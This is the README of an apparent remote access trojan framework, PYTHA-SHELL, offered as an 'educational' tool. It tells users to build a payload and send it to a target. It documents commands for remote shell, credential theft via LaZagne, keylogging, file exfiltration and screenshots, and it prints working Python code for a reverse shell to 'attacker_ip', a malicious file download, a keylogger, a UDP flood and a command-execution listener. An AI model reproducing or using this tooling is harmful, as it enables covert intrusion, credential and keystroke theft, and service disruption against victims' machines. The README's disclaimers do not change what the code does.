README.md

PYTHA-SHELL - Advanced Python Shell Environment

PYTHA-SHELL is a versatile cybersecurity tool designed for educational purposes, featuring an RCE (Remote Code Execution) mode. This tool allows users to explore and understand various attacks and vulnerabilities in a controlled environment. PYTHA-SHELL includes practical examples and demonstrations to help learners grasp the concepts of remote code execution and other security risks. Ideal for students, educators, and cybersecurity enthusiasts, PYTHA-SHELL aims to provide hands-on experience with real-world vulnerabilities and attacks in a safe and controlled setting.PYTHA-SHELL helps users gain practical experience in a secure environment ,making it a valuable asset for both learning and teaching.

Key Features Table

Feature	Description
Interactive Shell	Execute Python code interactively with real-time feedback.
Advanced Debugging	Access built-in debugging tools for code inspection and troubleshooting.
Code Autocompletion	Get intelligent code suggestions to speed up development.
Customizable Interface	Tailor the shell interface to fit your workflow.
Script Execution	Run Python scripts and view results directly within the shell.
Variable Inspection	Monitor and modify variables in real-time.

Feature Descriptions

Feature	Description
Execute Python Code	Type and run Python commands directly in the shell.
Debugging Tools	Set breakpoints, inspect variables, and step through code.
Autocompletion	Intelligent suggestions for code completion.
Script Execution	Load and run Python scripts with the run command.
Customizable Interface	Change the appearance and behavior of the shell to match user preferences.
Variable Inspection	Real-time monitoring and modification of variables.

Installation

To use PYTHA-SHELL, ensure you have Python 3.x installed. The tool also requires the prompt_toolkit library.

Install Required Dependencies

pip install prompt_toolkit

Clone the Repository and Install

git clone https://github.com/Faizan-Khanx/PYTHA-SHELL.git
cd PYTHA-SHELL
pip install -r requirements.txt
cd PYTHA
python PythaShell.py -h

Here's a table for the PythaShell.py options and their descriptions:

Option	Command	Description
-h, --help	PythaShell.py -h	Show this help message and exit
-o, --host	PythaShell.py -o	Host IP/hostname
-p, --port	PythaShell.py -p	Port
-i, --icon	PythaShell.py -i	Path to icon file
-c, --console	PythaShell.py -c	Run as a console application
-d, --debug	PythaShell.py -d	Enable PyInstaller debug mode
-m, --melt	PythaShell.py -m	Melt file on startup

Setup Usage

Simple Usage

• python3 PythaShell.py -o < host > -p < port > #Example python3 PythaShell.py -o 127.0.0.1 -p 1234

  

• Now Check The Dist Folder For The Binary. And Send The Binary To Your Target

• Here you can se the Payload with name main_client . Send this to your target .

Usage

PYTHA-SHELL is a command-line tool for executing Python code and interacting with an advanced shell environment.

Launch the Shell

python main_server.py -p <port> ``` #On Same Port You Use While Making The Payload

Server Commands

Command	Usage	Description
H	H	Help: Show available commands
L	L	List all connections (inactive connections shown)
I	I <index>	Interact with a connection by index
E	E <index>	Open a remote shell with the specified connection
S	S <command>	Send a command to every connection
O	O <hostname/IP> <port>	Change connection details (hostname/IP and port)
C	C <index>	Close the connection by index
X	X	Close/clear all connections
Q	Q	Close the server but keep the clients

• Now Execute L command to See The List of Total Hosts .

• After This Execute I command #Example I 1 >> if you want to interact with host 1 .

  

Interact Commands

Command	Usage	Description
H	H	Help: Show available commands
E	E	Open remote shell
Y	Y	Open Python interpreter
V	V	Find vulnerabilities (exploit-only mode)
R	R	Retrieve passwords using LaZagne
K	K <start/stop/dump>	Keylogger: Start, stop, or dump keystrokes
D	D <directory/file>	Download directory or file
U	U	Upload a file
S	S	Take a screenshot
I	I	View information about the connection
B	B	Move connection to the background
C	C	Close the connection

Example Usage Of Interact Mode

Here’s the Example Usage Of Interact Mode with the commands you asked for, now with example usage:

1. Help:

   >>> H

   Description: This command displays a help menu showing all available commands in interact mode.

2. Open Remote Shell:

   >>> E

   Example: Opens a shell to execute commands on the remote machine.

   >>> whoami
   root

   Description: The command E opens the remote shell, where you can now run commands like whoami to check the user on the remote host.

3. Open Python Interpreter:

   >>> Y

   Example: Opens a Python interpreter on the remote host.

   >>> x = 5
   >>> x * 2
   10

   Description: You can now execute Python code directly on the remote system after running the Y command.

4. Find Vulnerabilities (Exploit Only):

   >>> V

   Example: Lists vulnerabilities available for exploitation.

   >>> V
   [+] [CVE-2022-2586] nft_object UAF
   
   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
   
   [+] [CVE-2021-22555] Netfilter heap out-of-bounds write
   
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
   

   Description: This command scans the remote host and lists known vulnerabilities that have exploits available.

5. Retrieve Passwords using LaZagne:

   >>> R

   Example: Retrieves passwords stored on the remote host.

   >>> R
   [*] Password found: admin123

   Description: The R command runs the LaZagne tool on the remote host to recover stored credentials.

6. Keylogger Commands:

   • Start Keylogger:

     >>> K start

     Example: Starts the keylogger on the remote system.

     >>> K start
     [*] Keylogger started

   • Stop Keylogger:

     >>> K stop

     Example: Stops the keylogger.

     >>> K stop
     [*] Keylogger stopped

   • Dump Keylogger:

     >>> K dump

     Example: Dumps the logged keystrokes to a file.

     >>> K dump
     [*] Dumping keystrokes:
     password123

7. Download Directory or File:

   • Download Directory:

     >>> D /home/user/documents

     Example: Downloads the /documents directory from the remote system.

     >>> D /home/user/documents
     [*] Downloading directory /documents...

   • Download File:

     >>> D /home/user/file.txt

     Example: Downloads the file file.txt.

     >>> D /home/user/file.txt
     [*] Downloading file /file.txt...

8. Upload File:

   >>> U /path/to/local/file.txt

   Example: Uploads a file from your local machine to the remote system.

   >>> U /path/to/local/file.txt
   [*] Uploading file.txt to remote host...

9. Take Screenshot:

   >>> S

   Example: Takes a screenshot of the remote system.

   >>> S
   [*] Screenshot saved as screenshot.png

10. View Information:

    >>> I

    Example: Retrieves system information such as OS, memory, and CPU usage.

    >>> I
    [*] OS: Ubuntu 20.04
    [*] CPU: 4 cores
    [*] Memory: 8GB

11. Move Connection to Background:

    >>> B

    Example: Moves the active connection to the background, freeing up the interface.

    >>> B
    [*] Connection moved to background.

12. Close Connection:

    >>> C

    Example: Closes the current connection with the remote host.

    >>> C
    [*] Connection closed.

13. Execute Python Code:

    >>> print("Hello, World!")
    Hello, World!

    This command executes the Python code and prints the result.

14. Run a Python Script:

    >>> run('example_script.py')

    This command loads and runs the Python script example_script.py.

15. Inspect a Variable:

    >>> x = 10
    >>> x
    10

    This command assigns the value 10 to variable x and prints its value.

16. Set Breakpoints:

    >>> set_breakpoint()

    This command sets a breakpoint in the code for debugging.

17. Inspect Variables:

    >>> inspect_variable('x')

    This command inspects the variable x and shows its current value.

18. Use Autocompletion:

    >>> import math
    >>> math.pi

    Typing math. and using autocompletion will show available attributes like pi.

19. Customizable Interface:

    >>> customize_interface(theme='dark')

    This command changes the shell interface to a dark theme.

20. Educational Example - Reverse Shell Code:

    >>> # For educational purposes only. Be cautious and use responsibly.
    >>> import socket
    >>> import subprocess
    >>> import os
    >>> 
    >>> def reverse_shell():
    >>>     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    >>>     s.connect(('attacker_ip', 4444))  # Replace with the attacker's IP and port
    >>>     while True:
    >>>         command = s.recv(1024).decode('utf-8')
    >>>         if command.lower() == 'exit':
    >>>             break
    >>>         output = subprocess.getoutput(command)
    >>>         s.send(output.encode('utf-8'))
    >>>     s.close()
    >>> 
    >>> reverse_shell()

    Description: This code demonstrates a basic reverse shell, where the target machine connects back to an attacker's machine and executes commands received over the network. Warning: This is for educational purposes only. Do not use this code maliciously or without proper authorization. It’s meant to demonstrate how reverse shells work for learning and ethical hacking practice.

21. Educational Example - Malicious File Download:

    >>> # For educational purposes only. Use responsibly.
    >>> import urllib.request
    >>> url = 'http://malicious_website.com/malicious_file.exe'  # Replace with the malicious URL
    >>> save_path = 'malicious_file.exe'
    >>> urllib.request.urlretrieve(url, save_path)

    Description: This code snippet shows how to download a file from a given URL. In a malicious context, this could be used to download harmful files. Do not use this code for malicious purposes. It is included here for educational purposes to understand how such scripts operate.

22. Educational Example - Keylogger Code:

    >>> # For educational purposes only. Be cautious with such code.
    >>> from pynput import keyboard
    >>> 
    >>> def on_press(key):
    >>>     try:
    >>>         with open('keylog.txt', 'a') as f:
    >>>             f.write(f'{key.char}')
    >>>     except AttributeError:
    >>>         with open('keylog.txt', 'a') as f:
    >>>             f.write(f'{key}')
    >>> 
    >>> with keyboard.Listener(on_press=on_press) as listener:
    >>>     listener.join()

    Description: This code demonstrates a simple keylogger that records keystrokes to a file. Warning: This is for educational purposes only. Do not use this code to infringe on others' privacy. It’s meant to illustrate how keyloggers function for learning and ethical hacking practice.

23. Educational Example - SQL Injection Simulation:

    >>> # For educational purposes only. Use responsibly.
    >>> import sqlite3
    >>> 
    >>> conn = sqlite3.connect(':memory:')
    >>> cursor = conn.cursor()
    >>> cursor.execute('CREATE TABLE users (username TEXT, password TEXT)')
    >>> cursor.execute('INSERT INTO users (username, password) VALUES (?, ?)', ('admin', 'admin123'))
    >>> 
    >>> user_input = "' OR '1'='1"
    >>> query = f"SELECT * FROM users WHERE username='{user_input}'"
    >>> cursor.execute(query)
    >>> results = cursor.fetchall()
    >>> print(results)

    Description: This code demonstrates a simple SQL injection simulation by manipulating a query string to bypass authentication. Warning: This is for educational purposes only. Do not use this code to attack or compromise databases. It’s meant to illustrate how SQL injection works for learning and ethical hacking practice.

24. Educational Example - Buffer Overflow Simulation:

    >>> # For educational purposes only. Use responsibly.
    >>> import ctypes
    >>> 
    >>> def buffer_overflow():
    >>>     buf = ctypes.create_string_buffer(10)
    >>>     buf.value = b'A' * 20  # Overflow buffer with excessive data
    >>>     print(buf.value)
    >>> 
    >>> buffer_overflow()

    Description: This code demonstrates a buffer overflow by writing more data to a buffer than it can handle, potentially causing unexpected behavior. Warning: This is for educational purposes only. Do not use this code to exploit vulnerabilities. It’s meant to illustrate how buffer overflows work for learning and ethical hacking practice.

25. Educational Example - Denial of Service (DoS) Simulation:

    >>> # For educational purposes only. Use responsibly.
    >>> import socket
    >>> 
    >>> def dos_attack(target_ip, target_port):
    >>>     sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    >>>     message = b'A' * 1024  # Large message to flood the target
    >>>     while True:
    >>>         sock.sendto(message, (target_ip, target_port))
    >>> 
    >>> dos_attack('target_ip', 80)  # Replace 'target_ip' with the target's IP address

    Description: This code demonstrates a simple denial of service (DoS) attack by flooding a target with a large number of messages. Warning: This is for educational purposes only. Do not use this code to disrupt services. It’s meant to illustrate how DoS attacks work for learning and ethical hacking practice.

26. Educational Example - Remote Code Execution Simulation:

    >>> # For educational purposes only. Use responsibly.
    >>> import os
    >>> import socket
    >>> 
    >>> def remote_code_execution():
    >>>     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    >>>     s.bind(('0.0.0.0', 9999))
    >>>     s.listen(1)
    >>>     print("Listening for connections...")
    >>>     conn, addr = s.accept()
    >>>     print(f"Connection from {addr}")
    >>>     while True:
    >>>         data = conn.recv(1024).decode('utf-8')
    >>>         if not data:
    >>>             break
    >>>         output = os.popen(data).read()
    >>>         conn.send(output.encode('utf-8'))
    >>>     conn.close()
    >>> 
    >>> remote_code_execution()

    Description: This code demonstrates a remote code execution (RCE) simulation where the server listens for incoming connections and executes commands received from a client. Warning: This is for educational purposes only. Do not use this code to exploit systems. It’s meant to illustrate how remote code execution works for learning and ethical hacking practice.

Screenshots

Example ScreenShott Of V Command Which Shows System Vulnerability To Exploit

Example ScreenShott Of R Command Which Retreive All The Passwords

Example ScreenShott Of Y Command Which Open Python Interpreter,we can also inject Malicious Code

Example ScreenShott Of I Command Which Shows System Information

License

This project is licensed under the MIT License - see the LICENSE file for details.

Author

PYTHA-SHELL is developed by Faizan Khan.

• GitHub: Faizan-Khanx
• Instagram: @EthicalFaizan

Feel free to contribute to this project or suggest improvements by raising issues or pull requests on GitHub.

Contact

For any questions or feedback, please contact E-Mail Me

GITHUB STATS